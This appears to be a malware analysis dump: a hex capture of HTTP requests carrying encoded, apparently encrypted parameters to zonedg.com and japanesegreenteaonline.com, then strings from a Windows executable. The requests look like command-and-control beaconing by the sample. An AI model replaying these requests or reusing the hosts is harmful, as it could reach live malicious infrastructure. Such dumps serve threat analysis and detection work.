0x000000c0 (00192)   4a735825 3242534e 78623579 676d3143   JsX%2BSNxb5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a727269 47733646 31676171 77776b63   .rriGs6F1gaqwwkc
0x00000170 (00368)   7061766c 52556d53 55796533 444a6d7a   pavlRUmSUye3DJmz
0x00000180 (00384)   52566631 44594f25 32466945 76717a62   RVf1DYO%2FiEvqzb
0x00000190 (00400)   4d727056 50555943 56657477 446c6450   MrpVPUYCVetwDldP
0x000001a0 (00416)   64306254 55444f61 67253242 43505049   d0bTUDOag%2BCPPI
0x000001b0 (00432)   644f6441 56494544 68705679 74354931   dOdAVIEDhpVyt5I1
0x000001c0 (00448)   53415225 32464675 30555036 5a4a3949   SAR%2FFu0UP6ZJ9I
0x000001d0 (00464)   6a4c5951 2532426a 58393334 55545257   jLYQ%2BjX934UTRW
0x000001e0 (00480)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x000001f0 (00496)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000200 (00512)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x00000210 (00528)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x00000220 (00544)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000230 (00560)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x00000240 (00576)   2f322e30 0d0a0d0a                     /2.0....


Strings
\.hhG.h
h.
h....J
C.
..
M
...
.
r
{-
.&
080904b0
1.0.0.1
1871
FileVersion
&No Exit  Shift+N
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
&Yes
0hd\CaK
0h@hwN
0h"hy+
0hK@hRhu
0hRh`h/
0hx`h h
#%-1bBq
1dl^L"h
{1P*?g
1_:PhxKQ}
1UCCaY
-2h*34
!2hCd&1
\2h%.? h
2h>Rhph3E
}34M2hm
3;	9Xw
>?3Bh2h+^.
3KogGa#F
3TQ<ew
!4a$}8X
,4}.aAs
|4YsE~i
~56RhI
5fxPhz
5U"h\}J
,5x{hbha
6Cg\c,9$S
6f]qg,0
70Uj@;
7kBj/$
7qz<pI
7=	U]7
8	0h*n
80h(rhN
8orh|bh
99Xa^Gh
9-d.Zt
)?9`hJ
9p?[H^
9Rh$7U
aA@6.A
Ad1nfu
a`hTLf
AlphaBlend
_a'Px1S
bh6@h>
Bh'\bh
_Bh:Bh(
%bh\Bhrhs
BhDj~1Bhy[
Bhdy@h
-BhO0h
bhT15,
)Bh$+Y
;+bk?u
b;zHQW
C42h$zy
C8Mrh*	
=[?c[g
CIQ![!
<'CMT7
=Cn3#v
c)n&ph
CoCreateInstance
CoGetMalloc
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CreateFontIndirectA
C*t<\Rh$
CwWC*2h
;D0h4f
^(+d6I
@.data
DeleteCriticalSection
DeleteObject
d"hW{x
do4l$V
dqPhRh
!drh|,rh
)ed2h?G
e'D,F"h:
e	gS"h>
e+@hmPh*
EnterCriticalSection
EnumResourceTypesA
EOZkCMcW
EsCe9U
eTF	h	j
eTTvN[
EY]_[^
F#$5Tbh
f5T\Rh
F81g0S
FaY@hW
fBh@hLAe;
-f)Cw`
Fd,\_2htJ
f:h7T6|
F hdGY8d
F-`h-I
[fIvw4r
\FOyBh
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Fr}"Nr6
fu5yBh
FuN)?#0
FVL^+Q
fW+LLC)
fx3X`h}ubh3x
#fZ'/&	
g:0W;`1
g)\3Rhm
GDI32.dll
GetACP
GetCPInfo
GetCPInfoExA
GetCurrentProcessId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastError
GetLocaleInfoA
GetOEMCP
GetStartupInfoA
GetStdHandle
GetTextExtentPointA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersionExA
g h{2h~tl
g`h\H_
GiB~+2Ef
GN}bhn
g)Rh*c
gwd08X
`h-?{{
'##^{h1#"h[
h1.Mua&
	h2.dlU
 h2h0h
h2hbh|
h2h$gz
@h>32h(
h],3IT
h3S5bh
h60h0h
h${6;dw:F
h6Qh@h
h-76C3
h8%}8n
h=`(9>
h9z[JL52h
ha~A8n
hA]&TRh
hBh/hI
hck`h+
"h_D:8*
HE3LK7z
HeapSize
hEG-U1
@henQS
hF]n`h
@h#G7bh
*`h\`h
h`h*54MO
h hAph
h+[ hc
h@h[@h
h hi@h
h]`hk`h
h h=NA
@h`hNN
h`hui+ph
h`huq]z
HHxW?d
hH+Y,vdpht
hi?@hQ
h!kF|@
hKqphe
hKZjy[
h{lE6|:9
hLS	ExMx
hMBhJ/
h+mbht
Hm@hs9
hMO,^F(Bh
hn6M h
@hn9a'k'=
`h!/?O
"hO#@hbh
@h)ph2hV
@hPh|`h
hphoq7
h<ph<#v
@hqA(LL
$h_qVs
`h*(rh
hrh^,;
 hRh'e
 hrhl"h
hrhRhn
ht`h}Rh
htRh7Rh
["huSbh#
h#V{o)rh
hwFc hE
hwRh2h
hZ5,~abhPh
hZBhrh
hZ`h=C
hZ^@hf
hZph~bhuPhW
hZrhf^
I-0hMh
i6BhGH
ibhS40h
IE`hMN
I,}"hs
InitializeCriticalSection
InterlockedExchange
InterlockedIncrement
iq,4l+
IrhPh!
Iyy2v"
)J`hU*~#U
%j}|s:
jT4gk*6J+l
:.JWcx
Kb	B-\pu
KD}.u`h
!^@/kE
KERNEL32.dll
K hi(,
k"hU+$
K]ifph
<kihux
$	k?jAR
*.kJb#S
KKIrhT
k)PhA#[
KXHu2:a*B
LeaveCriticalSection
	l@hRh/L
Lj.F!!
%lkhC?B
lL%tXI_
)\LMJX_
LoadLibraryW
lph"hd
(lqJaD
?;LrhgX
Lr?'xz
lstrlenW
L{U !AT|~
L:x3Rh
Lz&@h-
+#m.:$
mgRh%v
mi,1($
MSIMG32.dll
MultiByteToWideChar
)M#$'w
M${ZPC
na[LA3
&nH8 '
NlK@hf
O"h;;4
oh4`?z
]!O-.I~
Oi{b{.
{\o\ J
ole32.dll
-_o`t)
Ph0hGI
PhjA h(
PhLI@h
ph&O>l
ph<+Ph
phrhbhBh5:4M
phzPh5
Q\:0jc"Uo
q&3ssN+-@ho.YIPh
qC,s))d
<!Q@FXJo
Q`h-j;
_qlxrh
QueryPerformanceCounter
qV`h@h
r'4q_p>1|
RaiseException
.reloc
rh5Frh
rhDPh?
rh@hCm
{Rhphg
rhph`h!e
Rhrh1Oz
#RhW-~
Rhx'{J
RN)WBk
ru	^%,
`($r%yP
SelectObject
SetHandleCount
sIG,v-
SL(}W_`hk<
s:o(HZ
StringFromGUID2
.Sz\bhD
~SZ*Mz
tAl^>T
tb\k~2
TDQ.@h;
T#f5Z|
Th6/4!
!This program cannot be run in DOS mode.
tHmntq?8
T@h$~Ph
*-=TKD
tLf:])
T}L hA0h
TLq10h
TlsGetValue
TlsSetValue
TM#w#5-
TransparentBlt
Tss h<
>TT"h-f
t%|wRh
tYs^vh
=U6i8sa_
 Uc2<|n
u e6YiB
u|eUuNS
u_juUK>
uM=R%g
UnhandledExceptionFilter
V_A}|\-\
V hRh5Q
VJMhgx{
vocKu7v-d+
VY}~hj
_WA dUV
w&bhGU
'Wh&q=
WideCharToMultiByte
}	^%wm
\<wNEb
<Wp}:|
W&pK2<
WriteFile
.,WYU%
x46[SW
xBhjTm
XEFc2hT
xfPhgZ
X}}HE,aw
XH/~w)
x@IfWB
x!J@hbh
[$X.Vu|y
_<x*ybh
 y0`mJ
Y2FnZ]
+Y3{gph
>y5:-+
YBgWNS
ygUvhG
YoG,0f ]
yph0ha&
yphFrhk
ytinRh h
yU"EO;
	YY-bh
$Z)7Zc
zafx;S hN*
zA]K<z
^z:ar?q
zBSCbi{f
Z'+=+D	
z@hf%,=
[_Zn,s
z|o1=j
/Zsiif
zu#a}f>s